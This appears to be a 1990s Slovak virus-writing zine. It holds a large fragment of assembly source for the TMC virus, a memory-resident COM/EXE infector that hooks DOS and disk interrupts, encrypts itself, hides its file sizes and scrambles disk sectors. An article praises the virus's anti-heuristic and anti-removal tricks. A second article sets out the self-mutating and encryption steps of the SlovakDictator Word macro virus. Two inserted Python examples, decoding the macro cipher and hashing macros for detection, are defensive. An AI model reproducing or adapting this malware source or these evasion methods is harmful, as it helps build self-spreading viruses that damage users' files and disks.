mov ax,[bx+2] ;if one just after another - no jump sub ax,[bx] cmp ax,DLZINS jne mjin inc dx inc dx call Mtog inc bx inc bx jmp short mshort mjin: call Rnd call Mtog mov dx,di sub dx,OFFSET ibuf-3 add dx,[bx] mov al,0e9h stosb inc bx inc bx mov ax,[bx] sub ax,dx cmp ax,126 jg mnear cmp ax,-129 jl mnear inc ax mov byte ptr [di-1],0ebh stosb ;put short if possible jmp short mshort mnear: stosw mshort: push bx push cx DB 0b9h vysr DW ? DB 0bah nizr DW ? add dx,[bx-2] adc cx,0 push cx push dx

;mov ;mov

cx,vysr dx,nizr

;CX:DX = position for instruction


call PozZac mov cx,DLZINS DB 0bah vpior DW ? ;mov dx,vpior add vpior,cx call Citanie pop dx pop cx jc mhpp call PozZac xchg cx,di mov dx,OFFSET ibuf sub cx,dx call Zapis ;put generated instruction into file mhpp: pop cx pop bx jc mhkon cmp bx,OFFSET poss+2*POCINS jnb mhkon jmp mnxt mhkon: ret MHeader ENDP ;********************* end of m. **************** ;*************** copied routines ************** zZakoduj PROC near mov cx,DLZVIR xor dx,dx ;OFFSET stvir call zzp1 mov ah,40h mov bx,handle pushf DB 9ah DD ? ;call ds:oriv21 jc zzk1 cmp ax,cx zzk1: pushf call zzp1 popf ret zzp1: push cx mov si,dx zzkmax: mov ax,0000h mov cx,DLZVIR zzp2: xor [si],ax zzkaax: add ax,0000h inc si loop zzp2 pop cx ret zZakoduj ENDP zres24: mov al,03h iret zInt13 PROC near pushf call cs:oriv13 ret zInt13 ENDP zTosi PROC near push cx


push dx shr cl,1 shr cl,1 and dh,11000000b or dh,cl mov cl,4 shr dh,cl mov dl,ch xchg si,dx pop dx pop cx ret zTosi ENDP zSkramb PROC near push ax push bx push cx DB 0b0h,? ;mov al,? DB 0bbh,?,? ;mov bx,? znxtss: mov cx,256 zls1: xor word ptr es:[bx],1212h inc bx inc bx loop zls1 dec al jnz znxtss pop cx pop bx pop ax ret zSkramb ENDP zres13: cmp ah,02h je zrtc cmp ah,03h je zrtc jmp zjtoo zrtc: cmp dx,0080h jne zencode test cx,0ffc0h jnz zencode push bx push dx push si push di push cx push cx mov si,ax and si,00ffh mov di,si mov al,01h push ax jz zbzch ;if AL=0 do nothing jcxz zgchi cmp cl,01h je zobbs znxtsc: cmp cl,17 ;if sector number > max. then error ja zgchi zr13ds: cmp cl,07h jb zctoo cmp ah,03h je zgchi push bx


mov cx,512 zflbf: mov byte ptr es:[bx],00h inc bx loop zflbf pop bx zrtcom: add bx,512 pop ax pop cx inc cx push cx push ax dec si jnz znxtsc zbzch: clc zzav: pop ax pushf xchg ax,di sub ax,si popf mov ah,ch pop cx pop cx pop di pop si pop dx pop bx retf 2 zobbs: mov cl,byte ptr cs:(OFFSET r13ds+2) zctoo: call zInt13 mov ch,ah jc zzav jmp zrtcom zgchi: stc mov ch,0bbh ;undefined error jmp zzav zencode:cmp dl,80h ;encoding resp. decoding jne zjtoo push ax push cx push dx push si push ds push cs pop ds mov byte ptr kolzak,0 mov odkzak,bx call zTosi and cl,3fh and dh,3fh zchdnd: or al,al jz zhtvo kontr: cmp si,1234h ;max. cyl. jae zhtvo cmp si,1234h ;min. cyl. jb ztdal inc kolzak jmp short znxslp ztdal: add odkzak,512 znxslp: dec al inc cl DB 80h,0f9h


mxskt DB ? ;cmp cl,? jbe zchdnd mov cl,1 inc dh DB 80h,0feh mxhlv DB ? ;cmp dh,? jbe zchdnd xor dh,dh inc si jmp zchdnd zhtvo: cmp kolzak,0 pop ds pop si pop dx pop cx pop ax je zjtoo cmp ah,02h je zeckn call zSkramb zeckn: call zInt13 pushf call zSkramb popf retf 2 zjtoo: DB 0eah ;zoriv13 DD ? kzZak LABEL near ;********************* EXE,COM modification *********** Subor PROC near Zapis: mov ah,40h jmp short s1 Citanie:mov ah,3fh s1: call s2 jc s3 cmp ax,cx s3: ret Zaciatok:xor cx,cx mov dx,cx PozZac: mov ax,4200h jmp short s2 Koniec: xor cx,cx mov dx,cx PozKon: mov ax,4202h s2 LABEL near Mhandle:mov bx,cs:handle Int21: pushf cli call cs:oriv21 ret Subor ENDP Infikuj PROC mov bp,sp near

mov ax,5700h call Mhandle mov bx,OFFSET ftime mov [bx],cx mov [bx+2],dx ;read time and date of last write call Identify jc mikon0


mov dx,30 call Rnd or dx,dx jz neozn mov [bx],ax

;with prob. 1:30 file won't be marked


neozn: mov vpior,OFFSET orprg ;position in saving area mov dx,0ffffh push dx call Rnd mov word ptr ds:(OFFSET kodmbx+1),dx mov word ptr ds:(OFFSET zkmax+1),dx pop dx call Rnd mov word ptr ds:(OFFSET kodabx+2),dx mov word ptr ds:(OFFSET zkaax+1),dx ;values for encoding call Zaciatok mov cx,1ah mov dx,OFFSET header push dx call Citanie jc mikon1 xchg si,dx mov di,OFFSET bheader rep movsb call Koniec mov si,ax mov di,dx pop bx cmp [bx].id,'MZ' je iEXE cmp [bx].id,'ZM' je iEXE mov bheader.flag,0 ;0 means COM cmp ax,65535-(DLZVIR+(VRCHOL-OFFSET endvir))-1 cmc jc mikon1 mov ax,3 ;do not overwrite leading jump cwd push bx jmp short iCOM iEXE: mov bheader.flag,1 mov ax,[bx].pages mul v512 sub ax,si sbb dx,di mikon0: jc mikon1 ;not whole mov ax,[bx].parps mul v16 push bx push ax push dx iCOM: sub si,ax sbb di,dx MINM=1000 MAXM=3000 or di,di jnz short igt64 mov dx,si sub dx,MINM

;much too long dlhy ?


mikon1: jb mikon2 ;not enough space cmp dx,(MAXM-MINM) jbe iltm igt64: mov dx,(MAXM-MINM) iltm: call Rnd add dx,MINM mov word ptr ds:(OFFSET kodmsi+1),dx add dx,VRCHOL-10h ;SS = CS+1 cmp bheader.flag,0 je iCOM5 mov header.vSP,dx ;set stack pointer iCOM5: add dx,DLZVIR-((VRCHOL-OFFSET stvir)-10h) mov word ptr ds:(OFFSET kodcsi+2),dx ;header limits add dx,OFFSET stsub-DLZVIR mov posss,dx ;set jump after decoding add dx,(-DLZINS+1)-(OFFSET stsub-OFFSET stvir) ;DX=Rnd+MINM-DLZINS+1 mov DLZHDR,dx add dx,DLZINS-2 not dx mov cx,-1 call PozKon ;setting to the virus beginning in file mov vysr,dx mov nizr,ax cmp bheader.flag,0 jne iEXE2 xchg ax,dx add dx,100h jmp short iCOM1 ;if COM take from beginning iEXE2: pop di pop si sub ax,si sbb dx,di ;relatively in file div v16 iCOM1: add word ptr ds:(OFFSET kodmsi+1),dx add word ptr ds:(OFFSET kodcsi+2),dx;set header limits push ax push dx call MHeader ;create header for decoding jnc twnm mikon2: jmp ikon twnm: pop dx pop ax mov cx,POCINS mov si,OFFSET poss il1: add [si],dx inc si inc si loop il1 ;set positions in poss sub nizr,dx sbb vysr,0 ;for correct positions on error pop bx cmp bheader.flag,0 jne iEXE3 mov byte ptr [bx],0e9h mov ax,poss[0*2] sub ax,3+100h mov word ptr [bx+1],ax ;ins. jmp at the beginning mov bheader.items,0 mov bheader.min,0 mov bheader.vCS,-10h mov bheader.vIP,100h jmp short iegh2


iEXE3: mov [bx].vCS,ax inc ax mov [bx].vSS,ax mov ax,poss[0*2] mov [bx].vIP,ax add [bx].vSP,dx ;set SP and byte ptr [bx].vSP,0feh ;SP is even mov [bx].items,0 ;no relocations mov ax,((VRCHOL-OFFSET endvir)-1)/16+1 cmp [bx].min,ax jae iegh1 mov [bx].min,ax iegh1: cmp [bx].max,ax jae iegh2 mov [bx].max,ax ;set up min. and max. memory requirments iegh2: push bx call Koniec call Zakoduj ;put v. to the file end jc ifail call Koniec div v512 inc ax pop bx cmp bheader.flag,0 je iCOM4 iEXE1: mov [bx].pages,ax mov [bx].lpage,dx iCOM4: push bx call Zaciatok mov cx,1ah pop dx call Zapis jc ifail stbkon: mov ax,5701h mov cx,ftime mov dx,fdate call Mhandle ikon: mov sp,bp ret ifail: mov dx,OFFSET orprg mov si,OFFSET poss opdl: push dx lodsw xchg dx,ax mov cx,vysr add dx,nizr adc cx,0 call PozZac pop dx mov cx,DLZINS call Zapis add dx,cx cmp si,OFFSET posss jb opdl ;restore overwritten parts and ftime,0ffe0h ;not marked jmp stbkon Infikuj ENDP ;************** routines for TSR part **** Nastav24 PROC near

;restore time and date


push dx push ds push cs pop ds mov ax,3524h call Int21 mov seg24,es mov off24,bx mov ax,2524h mov dx,OFFSET res24 call Int21 pop ds pop dx ret Nastav24 ENDP Vrat24 PROC near mov ax,2524h lds dx,dword ptr cs:off24 call Int21 ret Vrat24 ENDP POCKRP=6 retaz DB retaz1 DB retaz2 DB Over ;number of critical programs 4,'.COM',4,'.EXE' 4,'SCAN',5,'CLEAN',8,'FINDVIRU',5,'GUARD',3,'EMM' 6,'CHKDSK'

PROC near push dx push bx push cx push si push di push ds push es push ax mov si,dx mov di,OFFSET caname push cs pop es lea bx,[di-1] mov cx,DLZFNB ol1: lodsb cmp al,'a' jb nmp cmp al,'z' ja nmp sub al,'a'-'A' ;uppercase nmp: push ax push si nzero: cmp al,' ' jne nomdz lodsb or al,al jnz nzero ;no ending spaces pop si pop si jmp short nstfn nomdz: pop si pop ax cmp al,'\' je stfn


cmp al,'/' je stfn cmp al,':' jne nstfn stfn: mov bx,di nstfn: stosb or al,al jz whname loop ol1 whname: mov si,OFFSET retaz sub di,5 push cs pop ds call Porovnaj je porok call Porovnaj jne oinok ;is it COM or EXE ? porok: pop ax push ax xchg di,bx inc di cmp ax,4b00h jne nnchk mov si,OFFSET retaz2 call Porovnaj jne nnchk ;is it CHKDSK ? mov byte ptr ds:(OFFSET dtrad+1),OFFSET dnxt-OFFSET con1 nnchk: mov cx,POCKRP mov si,OFFSET retaz1 ol2: push cx call Porovnaj pop cx je oinok loop ol2 ;check for critical programs mov si,OFFSET caname xor bl,bl lodsw cmp ah,':' jne imdrv sub al,'A'-1 mov bl,al imdrv: mov ax,4408h call Int21 or ax,ax vsetky: jz oiok ;removable (floppy like) mov ax,4409h call Int21 jc oinok test dh,10h jnz oiok ;in network oinok: stc okon: pop ax pop es pop ds pop di pop si pop cx pop bx


pop dx ret oiok:; mov ax,0e07h ; int 10h clc jmp okon Over ENDP Porovnaj PROC near push di lodsb mov cl,al mov ax,si add ax,cx repe cmpsb mov si,ax pop di ret Porovnaj ENDP Identify PROC near ;is file inf. ? push dx mov ax,es:[bx+2] xor dx,dx div cs:v30 mov ax,es:[bx] and al,11111b cmp al,dl stc je iekon ;already infected mov ax,es:[bx] and ax,0ffe0h or al,dl clc iekon: pop dx ret Identify ENDP Subdlz PROC near sub word ptr es:[bx],DLZVIR sbb word ptr es:[bx+2],0 jnc npret add word ptr es:[bx],DLZVIR adc word ptr es:[bx+2],0 npret: ret Subdlz ENDP ;************** TSR 21h part ************* Infname PROC near ;DS:DX = file name push ax push bx push cx push si push di push bp push ds push es call Nastav24 mov ax,4300h call Int21 mov cs:attrib,cx mov ax,4301h xor cx,cx call Int21


jc err1 mov ax,3d02h call Int21 jc err2 push dx push ds push cs pop ds push cs pop es mov handle,ax call Infikuj mov ah,3eh call Mhandle pop ds pop dx err2: mov ax,4301h DB 0b9h attrib DW ? ;mov call Int21 err1: call Vrat24 pop es pop ds pop bp pop di pop si pop cx pop bx pop ax ret Infname ENDP


res21: pushf sti cmp ah,11h je dtrad cmp ah,12h jne dnxt dtrad: jmp short con1 ;switched jump condition con1: push bx push es push ax mov ah,2fh call Int21 pop ax call Int21 cmp al,0ffh je dterr push ax cmp byte ptr es:[bx],0ffh jne nrozs add bx,7 nrozs: add bx,17h call Identify pop ax jnc dterr add bx,1dh-17h call Subdlz dterr: pop es pop bx popf iret


dnxt: cmp ah,4eh je drozs cmp ah,4fh jne ndnxt drozs: push bx push es push ax mov ah,2fh call Int21 pop ax call Int21 jc droze push ax add bx,16h call Identify pop ax jnc drozne add bx,1ah-16h call Subdlz drozne: pop es pop bx popf clc retf 2 droze: pop es pop bx popf stc retf 2 ndnxt: cmp ax,4b53h jne obrnxt mov ax,454bh popf iret obrnxt: cmp ah,4ch jne nkprg mov byte ptr cs:(OFFSET dtrad+1),0 nkprg: cld push dx cmp ax,4b00h jne nsppg con3: jmp short miim miim: push ax push bx push ds push es mov ah,52h call Int21 mov ax,es:[bx-02h] nmcb: mov ds,ax add ax,ds:03h inc ax cmp byte ptr ds:00h,'Z' jne nmcb mov bx,cs cmp ax,bx jne cpch mov byte ptr ds:00h,'M' xor ax,ax mov ds,ax add word ptr ds:0413h,POCKIL ;memory look improvement cpch: mov byte ptr cs:(OFFSET con3+1),OFFSET aiim-OFFSET miim


pop es pop ds pop bx pop ax aiim: jmp short infac nsppg: cmp ah,3dh je infac ; cmp ah,43h ; je infac cmp ah,56h je infac cmp ax,6c00h jne nxts test dl,00010010b mov dx,si jz infac jmp short saveh nxts: cmp ah,3ch je saveh cmp ah,5bh je saveh cmp ah,3eh jne jor21 cmp bx,cs:chandle jne jor21 or bx,bx jz jor21 call Int21 jc mirets push ds push cs pop ds mov dx,OFFSET fname call Infname mov chandle,0 pop ds miretc: pop dx popf clc retf 2 jor21: pop dx popf jmp cs:oriv21 infac: call Over jc jor21 call Infname jmp short jor21 saveh: cmp cs:chandle,0 jne jor21 call Over jc jor21 mov cs:rhdx,dx pop dx push dx call Int21 db 0bah rhdx DW ? ;mov dx,rhdx jnc shok mirets: pop dx popf


stc retf 2 shok: push cx push si push di push es xchg si,dx mov di,OFFSET chandle push cs pop es stosw mov cx,DLZFNB rep movsb pop es pop di pop si pop cx jmp short miretc DB order endvir 'DidYouLeaveTheRoom?' DW 1230 ;very important year :) LABEL near

Zakoduj PROC near mov cx,DLZVIR xor dx,dx ;OFFSET stvir call zp1 mov ah,40h mov bx,handle pushf DB 9ah ;call oriv21 oriv21 DD ? jc zk1 cmp ax,cx zk1: pushf call zp1 popf ret zp1: push cx mov si,dx zkmax: mov ax,0000h mov cx,DLZVIR zp2: xor [si],ax zkaax: add ax,0000h inc si loop zp2 pop cx ret Zakoduj ENDP res24: mov al,03h iret Int13 PROC near pushf call cs:oriv13 ret Int13 ENDP Tosi PROC near push cx push dx shr cl,1


shr cl,1 and dh,11000000b or dh,cl mov cl,4 shr dh,cl mov dl,ch xchg si,dx pop dx pop cx ret Tosi ENDP Skramb PROC near push ax push bx push cx DB 0b0h ;mov al,kolzak kolzak DB ? DB 0b8h ;mov bx,odkzak odkzak DW ? nxtss: mov cx,256 ls1: xor word ptr es:[bx],1212h inc bx inc bx loop ls1 dec al jnz nxtss pop cx pop bx pop ax ret Skramb ENDP res13: cmp ah,02h je rtc cmp ah,03h je rtc jmp jtoo rtc: cmp dx,0080h jne encode test cx,0ffc0h jnz encode push bx push dx push si push di push cx push cx mov si,ax and si,00ffh mov di,si mov al,01h push ax jz bzch ;if AL=0 do nothing jcxz gchi cmp cl,01h je obbs nxtsc: cmp cl,17 ;if sector number > max. then error ja gchi r13ds: cmp cl,07h jb ctoo cmp ah,03h je gchi push bx


mov cx,512 flbf: mov byte ptr es:[bx],00h inc bx loop flbf pop bx rtcom: add bx,512 pop ax pop cx inc cx push cx push ax dec si jnz nxtsc bzch: clc zav: pop ax pushf xchg ax,di sub ax,si popf mov ah,ch pop cx pop cx pop di pop si pop dx pop bx retf 2 obbs: mov cl,byte ptr cs:(OFFSET r13ds+2) ctoo: call Int13 mov ch,ah jc zav jmp rtcom gchi: stc mov ch,0bbh ;undefined error jmp zav encode: cmp dl,80h ;encoding resp. decoding jne jtoo push ax push cx push dx push si push ds push cs pop ds mov kolzak,0 mov odkzak,bx call Tosi and cl,3fh and dh,3fh chdnd: or al,al jz htvo cmp si,1234h ;max. cyl. jae htvo cnflte: cmp si,1234h ;min. cyl. jb tdal inc kolzak jmp short nxslp tdal: add odkzak,512 nxslp: dec al inc cl DB 80h,0f9h,?


jbe chdnd mov cl,1 inc dh DB 80h,0feh,? jbe chdnd xor dh,dh inc si jmp chdnd htvo: cmp kolzak,0 pop ds pop si pop dx pop cx pop ax je jtoo cmp ah,02h je eckn call Skramb eckn: call zInt13 pushf call Skramb popf retf 2 jtoo: DB 0eah oriv13 DD ? handle header off24 seg24 ftime fdate chandle fname ibuf caname DW ? strc <> DW ? DW ? DW ? DW ? DW ? DB DLZFNB DUP(?) LABEL byte DB DLZFNB DUP(1)

;variables for mutation

endres LABEL near Vkod ENDS END start

For some four or five months it has been known that a new kind of virus had been released. The first rumorz talked 'bout a virus that screws all the heuristics. And, we've to say, it was pure fact, no advertising shit.

From a technical point of view, TMC is a resident COM'n'EXE infector. Infection occurs on execution, opening, renaming and copying of suitable files. It affects COMs under 57 kB and EXEs under 384 kB. Files whose name starts with 'ic', 'no', 'we', 'tb', 'av', 'sc', 'co', 'wi' or 'kr' are never infected. These strings cover a huge spectrum of anti-viruses: not only the best Slovak antivirus program NOD-ICE, but also other good AV tools. So TMC has a quite good chance to survive the most important first months in the wild. TMC sets the seconds field of the timestamp to the 'magic' value 8. The virus contains the texts:

TMC 1.0 by Ender from Slovakia
Welcome to the Tiny Mutation Compiler!
Dis is level 42.
Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel
Personal greetings: K. K., Dark Punisher

And you may now ask: "And what makes TMC so extraordinary?" Okay, let's go to the void main().

#define FALSE 0
#define TRUE 1
#define NOT_TRIVIAL 0.5
#define INFECTED_FILE_CONTAINS_BODY_OF_VIRUS FALSE

/* The body of the virus contains just some kind of compiler which compiles the virus into memory from encrypted source pseudocode. Because the compilation doesn't use any structure which is heuristic-sensitive, there is no heuristic alert here :) [ Simple and clever ] The compiler is also capable of inserting garbage jump instructions into the virus copy in memory. So again, no simple scan string in memory here. Just one little thingy here is not perfect: these jumps 'll not have a known size, so the compiler puts some extra NOPs there. The virus looks like an asm proggy compiled under TASM without the /m switch. */

#define ANTIHEURISTIC_CODE TRUE
/* TMC contains some kind of anti-cleaning trap, so it is not easy to remove from an infected file. Well, another life insurance */

#define EXTRA_STUFF TRUE
/* TMC has different features in different generations. Just check it out */

#define DETECTION_AND_REMOVAL NOT_TRIVIAL
/* As far as I know, only two antivirus programs detect TMC - Dr.Web and NOD-ICE. As an extra bonus, NOD is capable of removing TMC. Some dudes on the AV side seem to be really good at their work :( */

Ender, the promising author of this virus, has chosen his nick from 'Ender's Game' by Orson Scott Card. According to the author, the strings "Welcome to the Tiny Mutation Compiler!" and "Diz is level 42" are related to Level3 by Vyvojar.

Due to some kind of agreement between our mag and Ender, we were not allowed to publish the full sources of this excellent virus. As Ender stated, the sources 'll be released only after all the major anti-virus vendors detect and remove the virus. "They should have their work hard... they're paid for it, but we are not ...". So dear friend, we present you at least a sample of this virus. But we have the source prepared for public release as soon as TMC is removed by TBAV, SCAN, AVP, DRWEB, S&S, ALWIL! and the others from Virus Bulletin. Howgh!


The world's first true polymorphic macro virus infecting Word 7.x documents. The virus of the next generation. This description is brought to you by Nasty Lamer & Ugly Luser exclusively for the *-zine. (c) 1-mar-1997, Slovakia

In this article we describe how this macro virus works, what its advantages are in comparison with other existing Word 6.0 and 7.0 macro viruses, its disadvantages, and finally the plans of the authors of this virus for the near future. The source code (2nd generation) is shown at the end of this article. The macro generator (Lamer's Macro Engine) itself is intentionally not presented.

Introduction

Macro viruses for Word 6.0 and above infect Micro$oft Word documents and templates. The first macro virus for Word was written in the fall of 1994. At present there are over 500 known macro viruses and their number grows rapidly every day. But many of them are very similar to each other and do not offer anything new to virus writing technology. They use almost the same infection techniques and their bodies are the same in each copy of the virus. Many of them are very lame and primitive. Authors of macro viruses very often take whole parts of other macro viruses, modify them a little bit and release them as new viruses. Almost all known macro viruses have the same binary image of the macro body in each copy (so-called static macros). This feature greatly simplifies the work of antivirus companies: they can detect these macros exactly, with high accuracy, by the CRC method, and by using programs that automatically generate CRCs of macro bodies they are able to add detection for several hundred macro viruses a day. Current macro virus writers are not too inventive and it looks like only lamers write macro viruses. Do not forget that macro virus writing is not for real virus writers, as they prefer writing in assembler. The first breakthrough in macro virus writing technology was caused by the Outlaw virus. It was the first semi-polymorphic virus. Why semi-polymorphic? Because only the macro names were different in each copy of the virus, but its body remained static (some antiviruses used to detect viruses by their names). However, for people interested in the antivirus industry it was a nice opportunity to flood various magazines with detailed descriptions of this "new technology" in macro virus writing. After a long time the macro virus writers discovered that Micro$oft WordBasic offers the possibility of editing macros and thus of creating polymorphic macro viruses. At present these possibilities are not used very often. There exist only a few viruses which modify something in their source code and make each generation a little bit different. Their most often used method is simply inserting one or several dummy lines into the source code or changing the names of some variables. True polymorphic viruses were not known until WordMacro.SlovakDictator appeared.

Behind the macro virus detection techniques

Antivirus programs use different techniques to detect macro viruses. From the point of view of the techniques used, we can arrange them into the following categories:

1. The method based on looking for "virus strings". Because a big part of a macro consists of text, the strings must be long enough to avoid false alarms. The frequently used and also reasonable size for these strings is between 24 and 32 bytes. The advantage of this method is that one search string can detect several variants of a big family of viruses. In most cases this method cannot detect viruses exactly.

2. The method based on computing CRCs. This is the only method able to detect all static macro viruses exactly. Its big disadvantage is that it fails as soon as someone adds, for example, a tab character after the end of the macro :). At present most antivirus programs use this method.

3. The method based on heuristic analysis of the macros. This is a good method for detecting new and even unknown macro viruses.

4. Other methods. They use a combination of several methods mentioned above or some new techniques.

Description of the WordMacro.SlovakDictator macro virus

This virus is the first real attempt to write a macro virus undetectable by "search strings". It also fucks all scanners based on computing CRC, because it has almost unlimited mutation capability. We decided to write this virus to illustrate some techniques which MacroFuck Corporation and their Macro$oft Word offer to macro virus writers. The virus contains only one unencrypted viral macro, AutoClose, and its size is from 14 kB to 16 kB (the size of variant B may exceed 16 kB). All names of variables, procedures, functions and constants are fully mutated and for this reason the final size of the macro is different for each copy of the virus. The macro does not use any command for copying macros (MacroCopy or Organizer) to replicate; it uses only commands for creating and editing macros. Due to this feature it is not yet detectable by known virus scanners, not even by heuristic scanners. Detection of this virus will probably cause problems to antivirus programs which use "search strings" for macro detection. The whole macro is divided into three parts. In the first part all global variables, arrays and constants are declared. The second part performs a check of the version of Word and contains all procedures and functions needed for creating the macro and executing it. The third and final part contains two tables. The first table stores the whole macro body (its source lines) in encrypted form. The source lines in this table do not contain the two tables themselves, because they are already present in the third part of the macro.

The actions of the macro virus are performed in several steps:

1. It checks whether the version of Micro$oft Word in use is 7.x. If yes, the further steps are performed; otherwise the macro finishes.

2. It decrypts the first table in the third part of the macro. The chosen encryption method is very trivial: each byte is decrypted with a constant which may have a value from 4 to 13 (try to guess why?). This value is added to (or subtracted from) each character of the strings that belong to the first table in the third part of the macro.

3. It creates a temporary macro with a random name and inserts the decrypted source lines of the macro (the first two parts of the macro) into it.

4. It replaces all occurrences of the string "@@" with a double quote ("). The characters @@ mark all places that have to be replaced with a quote.

5. It inserts both tables at the end of this macro: the table with the decrypted source lines and the table with the polymorphic names of variables, procedures, functions and constants.

6. It calls a procedure which mutates all names stored in the table of polymorphic names. These names are from 10 to 19 characters long.

7. It runs this temporary macro. When the macro is executed it first checks whether it has to infect the global template or the document. If the global template and the closing document already contain a macro named AutoClose, nothing is done. Otherwise the macro creates a macro AutoClose in the global template or document and performs actions similar to those described in the previous paragraphs.

The macro contains a special payload. On the 4th and 11th of each month it displays a message box with a special warning that you are infected by the WordMacro.SlovakDictator virus.

8. It deletes the temporary macro, enables screen updating, enables interrupting a macro by pressing the ESC key and finishes.
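The per-byte shift of step 2 is easy to undo during analysis once the allowed range of the constant is known. The following is an added example in Python, not code from the article or its authors: it tries every constant in the stated range 4..13 on a whole table and keeps the one whose result reads as WordBasic. The sample lines are constructed for this example (plaintext shifted by 6 and by 9), not copied from the listing, and the keyword list is illustrative.

```python
import re

# Constructed sample lines, not copied from the article's listing: the
# WordBasic plaintext was shifted by +6 per byte (variant A style) and by
# +9 (variant B style), exactly the transformation the article describes.
SAMPLE_A = [
    "Y{h&G{zuIruyk",                           # Sub AutoClose
    "Ol&~&C&FFG{zuIruykFF&Znkt&Igrr&Otlkiz",   # If x = @@AutoClose@@ Then Call Infect
    "Ktj&Y{h",                                 # End Sub
]
SAMPLE_B = [
    "Nwm)\\~k",          # End Sub
    "Ox{)r)F):)]x):9",   # For i = 1 To 10
]

SHIFT_RANGE = range(4, 14)   # the article: the constant lies between 4 and 13
# Words expected to surface once the right constant is used (illustrative list).
KEYWORDS = {"Sub", "End", "If", "Then", "For", "To", "Next", "Dim",
            "Call", "Function", "Shared", "On", "Error", "Resume"}


def shift_line(line, k):
    """Subtract k from every byte of one table entry.  The table is a byte
    string; treating it as cp1252 keeps bytes above 0x7E (which show up as
    odd characters in a listing) intact."""
    raw = line.encode("cp1252")
    return bytes((b - k) & 0xFF for b in raw).decode("cp1252", errors="replace")


def plausibility(text):
    """Score one candidate plaintext: it must be printable ASCII, must not
    contain a raw double quote (the macro carries quotes only as @@, see
    step 4), and earns a point per WordBasic keyword."""
    if any(not 0x20 <= ord(c) <= 0x7E for c in text) or '"' in text:
        return -1
    return sum(1 for w in re.findall(r"[A-Za-z]+", text) if w in KEYWORDS)


def recover_shift(lines):
    """Try every allowed constant on the whole table and keep the one whose
    result reads most like WordBasic.  Returns (constant, decoded lines) with
    the @@ markers already turned back into quotes."""
    best_k, best_score = None, None
    for k in SHIFT_RANGE:
        score = sum(plausibility(shift_line(ln, k)) for ln in lines)
        if best_score is None or score > best_score:
            best_k, best_score = k, score
    decoded = [shift_line(ln, best_k).replace("@@", '"') for ln in lines]
    return best_k, decoded


if __name__ == "__main__":
    for name, table in (("variant A sample", SAMPLE_A), ("variant B sample", SAMPLE_B)):
        k, plain = recover_shift(table)
        print(f"{name}: constant {k}")
        for ln in plain:
            print("   ", ln)
```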

Advantages of the virus:

The virus brings new technology to macro virus writing :)
It is the first Slovak macro virus :)
It is the world's first true polymorphic virus :)
Its source lines are internally encrypted, each copy with a different encryption constant :)
It will be hard to detect by "search strings", because it does not contain any typical virus strings. It cannot be detected by computing CRC (only lame researchers will do that) :) The longest possible string is 15 bytes long, but this string cannot be used as a virus string.
It does not use commands for copying macros :)
It does not contain any operation suspicious to heuristic scanners :)
No known antivirus program detects it, not even heuristic programs.
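The CRC weakness noted in the detection techniques section (an appended tab changes the checksum) and the renamed-name polymorphism claimed above both disappear when the macro is hashed in a canonical form rather than byte for byte. The following is an added example in Python, not code from the article or its authors: it tokenizes WordBasic, drops comments and layout, numbers every non-reserved name by first appearance and hashes the result. The RESERVED word list is illustrative and the two macro copies are constructed for this example.

```python
import hashlib
import re

# WordBasic keywords and Word commands: spelled the same in every copy, so
# they are kept.  Everything else is a user-chosen name that a polymorphic
# copy may rename.  This list is illustrative, not the whole vocabulary.
RESERVED = {
    "sub", "end", "if", "then", "else", "for", "to", "next", "dim", "shared",
    "call", "function", "on", "error", "resume", "rem", "goto", "as", "and",
    "or", "not", "while", "wend", "step", "beep", "int", "rnd", "str$", "chr$",
    "macroname$", "countmacros", "toolsmacro", "insert", "insertpara",
    "editclear", "editreplace", "docclose", "activate", "windowname$",
}

# string literal | identifier (optional $ suffix) | number | any other char
TOKEN = re.compile(r'"[^"]*"|[A-Za-z_][A-Za-z0-9_]*\$?|\d+|\S')


def canonical_lines(source):
    """Tokenise a macro, drop comments and all layout, and replace every
    non-reserved name with a placeholder numbered by first appearance."""
    names = {}
    lines = []
    for line in source.splitlines():
        toks = []
        for i, tok in enumerate(TOKEN.findall(line)):
            if tok == "'" or (i == 0 and tok.lower() == "rem"):
                break                        # rest of the line is a comment
            if tok.startswith('"') or not (tok[0].isalpha() or tok[0] == "_"):
                toks.append(tok)             # string literal, number, punctuation
            elif tok.lower() in RESERVED:
                toks.append(tok.lower())     # language word, case-folded
            else:
                base = tok.lower().rstrip("$")
                if base not in names:
                    names[base] = "v%d" % len(names)
                toks.append(names[base] + ("$" if tok.endswith("$") else ""))
        if toks:                             # blank, tab-only and comment lines vanish
            lines.append(" ".join(toks))
    return lines


def canonical_hash(source):
    """SHA-256 over the canonical form: stable across renamed copies."""
    return hashlib.sha256("\n".join(canonical_lines(source)).encode()).hexdigest()


def raw_hash(source):
    """What a plain CRC/checksum signature effectively does: hash the bytes."""
    return hashlib.sha256(source.encode()).hexdigest()


# Two constructed copies of the same harmless, non-replicating macro skeleton,
# differing only in user-chosen names, spacing, comments and a trailing tab.
COPY_1 = '''\
Sub MAIN
Dim Shared Lines$(200)
Dim Installed
Installed = CheckInstalled(1)
If Installed = 0 Then Call Report(WindowName$())
End Sub

Function CheckInstalled(j)
On Error Resume Next
CheckInstalled = 0
For i = 1 To CountMacros(j)
If MacroName$(i, j) = "AutoClose" Then CheckInstalled = 1
Next i
End Function
'''

COPY_2 = '''\
Sub MAIN
Dim Shared JKHDBVIVFHSIOL$(200)
Dim   RTQABCFRIMEDSNN
RTQABCFRIMEDSNN = TSBMNQRJVKTUNCT(1)
If RTQABCFRIMEDSNN = 0 Then Call AQIEGQHTEKGMJPAR(WindowName$())
End Sub ' a trailing comment changes nothing either

Function TSBMNQRJVKTUNCT(j)
REM an extra comment line
On Error Resume Next
TSBMNQRJVKTUNCT = 0
For LMVUIODKQIDBT = 1 To CountMacros(j)
If MacroName$(LMVUIODKQIDBT, j) = "AutoClose" Then TSBMNQRJVKTUNCT = 1
Next LMVUIODKQIDBT
End Function
\t'''

if __name__ == "__main__":
    print("raw hashes equal:      ", raw_hash(COPY_1) == raw_hash(COPY_2))
    print("canonical hashes equal:", canonical_hash(COPY_1) == canonical_hash(COPY_2))
```

The canonical hash still changes when any real statement changes, so it is a signature for one macro body, not a generic detector.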

Disadvantages:

The process of infection is very slow; it may take over 15 seconds on slow PCs (on the tested Pentium 166 MHz it took 15 seconds) :|
Although the virus prevents the ESC key from interrupting the macro, pressing keys while the virus is running may cause a bug in creating the mutated variable names, and for this reason a bug in the executed macro may occur (it will be fixed in the version for Word 8.0) :|
The virus is language dependent - it infects only the English version of Word 7.x documents.
Due to its special infection techniques it is not able to infect Word 8.0 documents.

